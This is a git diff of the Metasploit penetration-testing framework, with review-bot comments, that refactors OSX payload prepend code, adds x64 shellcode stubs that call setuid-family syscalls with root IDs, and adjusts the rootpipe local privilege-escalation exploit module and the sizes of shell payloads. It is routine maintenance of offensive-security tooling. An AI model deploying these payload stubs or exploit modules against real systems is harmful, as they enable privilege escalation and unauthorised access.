diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb
index aa91314e6b..a3431949f1 100644
--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -87,10 +87,6 @@ module Msf::Payload::Linux
 ret
 end
-
- #
- # Overload the generate() call to prefix our stubs
- #
 def apply_prepends(buf)
 pre = ''
 app = ''
diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb
index 0eab13d568..35b1a82637 100644
--- a/lib/msf/core/payload/osx.rb
+++ b/lib/msf/core/payload/osx.rb
@@ -23,49 +23,49 @@ module Msf::Payload::Osx
 [
 false,
 "Prepend a stub that executes the setresuid(0, 0, 0) system call",
- "false"
+ false
 ]
 ),
 Msf::OptBool.new('PrependSetreuid',
 [
 false,
 "Prepend a stub that executes the setreuid(0, 0) system call",
- "false"
+ false
 ]
 ),
 Msf::OptBool.new('PrependSetuid',
 [
 false,
 "Prepend a stub that executes the setuid(0) system call",
- "false"
+ false
 ]
 ),
 Msf::OptBool.new('PrependSetresgid',
 [
 false,
 "Prepend a stub that executes the setresgid(0, 0, 0) system call",
- "false"
+ false
 ]
 ),
 Msf::OptBool.new('PrependSetregid',
 [
 false,
 "Prepend a stub that executes the setregid(0, 0) system call",
- "false"
+ false
 ]
 ),
 Msf::OptBool.new('PrependSetgid',
 [
 false,
 "Prepend a stub that executes the setgid(0) system call",
- "false"
+ false
 ]
 ),
 Msf::OptBool.new('AppendExit',
 [
 false,
 "Append a stub that executes the exit(0) system call",
- "false"
+ false
 ]
 ),
 ], Msf::Payload::Osx)
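Review bot: The switch of each default from the string `"false"` to the boolean `false` is the substantive fix in this hunk, and the CachedSize hunks later in the commit show why it matters: every x86 OSX payload shrinks by exactly 65 bytes, which equals the summed length of the seven x86 stubs in the next hunk (12+9+8+12+9+8+7), consistent with the truthy string default having caused all of them to be prepended unconditionally. That deserves a sentence in the commit message, since a reader of this hunk alone sees only a cosmetic type change. The handlers in the following hunk still test the raw datastore value with `if (datastore['PrependSetresuid'])`, so the fix relies on the framework normalising user-supplied values to booleans before they reach that check; if it does not, a user setting the option to the string `"false"` would reintroduce the same behaviour, and a short comment above the option list noting that dependency would help the next maintainer.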
@@ -73,95 +73,155 @@ module Msf::Payload::Osx
 ret
 end
-
- #
- # Overload the generate() call to prefix our stubs
- #
- def generate(*args)
- # Call the real generator to get the payload
- buf = super(*args)
+ def apply_prepends(buf)
+ test_arch = [ *(self.arch) ]
 pre = ''
 app = ''
- test_arch = [ *(self.arch) ]
- # Handle all x86 code here
 if (test_arch.include?(ARCH_X86))
-
- # Prepend
-
- if (datastore['PrependSetresuid'])
- # setresuid(0, 0, 0)
- pre << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x66\xb8\x37\x01" +# movw $0x0137,%ax #
- "\xcd\x80" # int $0x80 #
- end
-
- if (datastore['PrependSetreuid'])
- # setreuid(0, 0)
- pre << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\xb0\x7e" +# movb $0x7e,%al #
- "\xcd\x80" # int $0x80 #
- end
-
- if (datastore['PrependSetuid'])
- # setuid(0)
- pre << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\xb0\x17" +# movb $0x17,%al #
- "\xcd\x80" # int $0x80 #
- end
-
- if (datastore['PrependSetresgid'])
- # setresgid(0, 0, 0)
- pre << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x66\xb8\x38\x01" +# movw $0x0138,%ax #
- "\xcd\x80" # int $0x80 #
- end
-
- if (datastore['PrependSetregid'])
- # setregid(0, 0)
- pre << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\xb0\x7f" +# movb $0x7f,%al #
- "\xcd\x80" # int $0x80 #
- end
-
- if (datastore['PrependSetgid'])
- # setgid(0)
- pre << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\x50" +# pushl %eax #
- "\xb0\xb5" +# movb $0xb5,%al #
- "\xcd\x80" # int $0x80 #
- end
- # Append
-
- if (datastore['AppendExit'])
- # exit(0)
- app << "\x31\xc0" +# xorl %eax,%eax #
- "\x50" +# pushl %eax #
- "\xb0\x01" +# movb $0x01,%al #
- "\xcd\x80" # int $0x80 #
- end
-
+ handle_x86_osx_opts(pre, app)
+ elsif (test_arch.include?(ARCH_X86_64))
+ handle_x64_osx_opts(pre, app)
 end
- return (pre + buf + app)
+ pre + buf + app
+ end
+
+ def handle_x86_osx_opts(pre, app)
+ if (datastore['PrependSetresuid'])
+ # setresuid(0, 0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x66\xb8\x37\x01" +# movw $0x0137,%ax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetreuid'])
+ # setreuid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x7e" +# movb $0x7e,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetuid'])
+ # setuid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x17" +# movb $0x17,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x66\xb8\x38\x01" +# movw $0x0138,%ax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x7f" +# movb $0x7f,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xb5" +# movb $0xb5,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['AppendExit'])
+ # exit(0)
+ app << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x01" +# movb $0x01,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+ end
+
+ def handle_x64_osx_opts(pre, app)
+ if (datastore['PrependSetresuid'])
+ # setresuid(0, 0, 0)
+ raise RuntimeError, "setresuid syscall is not implemented on x64 OSX systems"
+ end
+
+ if (datastore['PrependSetreuid'])
+ # setreuid(0, 0)
+ pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
+ "\x49\xc1\xe0\x18" +# shl r8, 24
+ "\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
+ "\x4c\x89\xc0" +# mov rax, r8
+ "\x48\x31\xff" +# xor rdi, rdi 0
+ "\x48\x31\xf6" +# xor rsi, rsi 0
+ "\x0f\x05" # syscall
+ end
+
+ if (datastore['PrependSetuid'])
+ # setuid(0)
+ pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
+ "\x49\xc1\xe0\x18" +# shl r8, 24
+ "\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
+ "\x4c\x89\xc0" +# mov rax, r8
+ "\x48\x31\xff" +# xor rdi, rdi 0
+ "\x0f\x05" # syscall
+ end
+
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ raise RuntimeError, "setresgid syscall is not implemented on x64 OSX systems"
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
+ "\x49\xc1\xe0\x18" +# shl r8, 24
+ "\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
+ "\x4c\x89\xc0" +# mov rax, r8
+ "\x48\x31\xff" +# xor rdi, rdi 0
+ "\x48\x31\xf6" +# xor rsi, rsi 0
+ "\x0f\x05" # syscall
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
+ "\x49\xc1\xe0\x17" +# shl r8, 23
+ "\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
+ "\x49\xd1\xe0" +# shl r8, 1
+ "\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
+ "\x4c\x89\xc0" +# mov rax, r8
+ "\x48\x31\xff" +# xor rdi, rdi 0
+ "\x0f\x05" # syscall
+ end
+
+ if (datastore['AppendExit'])
+ # exit(0)
+ app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
+ "\x49\xc1\xe0\x18" +# shl r8, 24
+ "\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
+ "\x4c\x89\xc0" +# mov rax, r8
+ "\x48\x31\xff" +# xor rdi, rdi 0
+ "\x0f\x05" # syscall
+ end
 end
diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb
index bc4bbded25..57b18d91a9 100644
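Review bot: `apply_prepends` silently ignores every Prepend*/AppendExit option when `test_arch` contains neither ARCH_X86 nor ARCH_X86_64, whereas the new x64 path raises for the two stubs it cannot provide; an operator who enabled `PrependSetuid` on such a payload gets an unmodified buffer and no indication that the request was dropped. A trailing `else` branch that fails loudly when any of those seven options is set would make the two paths consistent, e.g. `else` / `raise RuntimeError, "Prepend/Append options are not supported for this arch" if datastore['PrependSetuid']`, extended to the remaining six keys. The explanatory comment on the old `generate` was deleted without a replacement, so `apply_prepends`, `handle_x86_osx_opts` and `handle_x64_osx_opts` should each get a one-line comment, the latter two stating that they append to `pre`/`app` in place, which is why the caller must initialise them as mutable strings rather than frozen literals. The `end` that closes the module lies outside this hunk.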
--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -42,13 +42,13 @@ class Metasploit4 < Msf::Exploit::Local
 'Platform' => 'osx',
 'Arch' => ARCH_X86_64,
 'SessionTypes' => ['shell'],
+ 'Privileged' => true,
 'Targets' => [ ['Mac OS X 10.9-10.10.2', {}] ],
 'DefaultTarget' => 0,
 'DefaultOptions' => {
- 'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
- 'CMD' => '/bin/zsh'
+ 'PrependSetreuid' => true
 }
 ))
diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb
index 70e84e6000..d88a57cf46 100644
--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -17,7 +17,7 @@ require 'msf/core'
 ###
 module Metasploit3
- CachedSize = 81
+ CachedSize = 16
 include Msf::Payload::Single
 include Msf::Payload::Osx
diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
index f5ab2fa770..3ceef27567 100644
--- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
- CachedSize = 139
+ CachedSize = 74
 include Msf::Payload::Single
 include Msf::Payload::Osx
diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb
index b27eb869f8..a73ce6d16a 100644
--- a/modules/payloads/singles/osx/x86/shell_find_port.rb
+++ b/modules/payloads/singles/osx/x86/shell_find_port.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
- CachedSize = 126
+ CachedSize = 61
 include Msf::Payload::Single
 include Msf::Payload::Osx
diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
index 8e1434c354..448d9fcd01 100644
--- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
- CachedSize = 130
+ CachedSize = 65
 include Msf::Payload::Single
 include Msf::Payload::Osx
diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
index 6ffc3928d8..d40d2cdaf7 100644
--- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
- CachedSize = 217
+ CachedSize = 152
 include Msf::Payload::Single
 include Msf::Payload::Osx
diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
index 84f3502cab..3803a6ce9c 100644
--- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
- CachedSize = 196
+ CachedSize = 131
 include Msf::Payload::Single
 include Msf::Payload::Osx